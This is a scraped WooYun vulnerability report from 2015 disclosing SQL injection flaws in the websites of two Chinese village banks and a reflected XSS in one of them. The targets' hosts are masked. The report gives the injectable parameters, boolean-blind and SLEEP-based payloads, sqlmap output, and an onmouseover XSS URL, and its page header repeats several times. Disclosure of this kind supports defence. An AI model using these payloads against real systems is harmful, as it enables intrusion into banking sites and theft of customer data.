两个农商行的漏洞问题打包 | wooyun-2015-0146209| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0146209

漏洞标题：两个农商行的漏洞问题打包

漏洞作者：路人甲

提交时间：2015-10-12 18:23

修复时间：2015-10-17 18:24

公开时间：2015-10-17 18:24

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-12：细节已通知厂商并且等待厂商处理中
2015-10-17：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

我的心好难受，这几天一直没怎么缓解，LP希望你以后好好的。

详细说明：

安顺西航南马村镇银行伪静态注入，安徽舒城正兴村镇银行注入&XSS。

漏洞证明：

我不擅长拖库，我也不喜欢拖库，证明存在问题即可。
问题1：安顺西航南马村镇银行伪静态注入（http://**.**.**.**/）
注入点：http://**.**.**.**/index.php/Index/listnews/id/120（120参数存在注入），一开始就怀疑，于是120后面加个*，扔到SQLMAP跑下：
数据库是MySQL，我不喜欢拖库。

sqlmap identified the following injection points with a total of 83 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://**.**.**.**:80/index.php/Index/listnews/id/120 AND 6029=6029
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: http://**.**.**.**:80/index.php/Index/listnews/id/120 AND SLEEP(5)
---
web server operating system: Windows
web application technology: ASP.NET
back-end DBMS: MySQL 5.0.12

问题2：安徽舒城正兴村镇银行注入（http://**.**.**.**）
注入点：http://**.**.**.**/system/sys0_inc_docnav.asp?d_ID=256（d_ID为注入参数）
d_ID后面加and 1=1，页面返回内容不变。

and 1=2时，页面返回的内容不同，典型的SQL注入。

在用工具测试下，数据库是DB2

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: d_ID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: d_ID=256 AND 3581=3581
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: IBM DB2

问题3：安徽舒城正兴村镇银行反射型XSS
提交如下的URL：（SearchStr存在XSS）
http://**.**.**.**//tmp/Nav_lianxi.asp?action=search&SearchStr=the%22%20onmouseover%3dprompt(926044)%20bad%20%3d%22&SS_ID=27&Submit=%cb%d1%cb%f7&Submit2=%c1%f4%d1%d4
测试结果截图：

修复方案：

过滤。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-10-17 18:24

厂商回复：

漏洞Rank：15 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0146209

漏洞标题：两个农商行的漏洞问题打包

相关厂商：农商行

漏洞作者：路人甲

提交时间：2015-10-12 18:23

修复时间：2015-10-17 18:24

公开时间：2015-10-17 18:24

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0146209

漏洞标题：两个农商行的漏洞问题打包

相关厂商：农商行

漏洞作者： 路人甲

提交时间：2015-10-12 18:23

修复时间：2015-10-17 18:24

公开时间：2015-10-17 18:24

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0146209"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云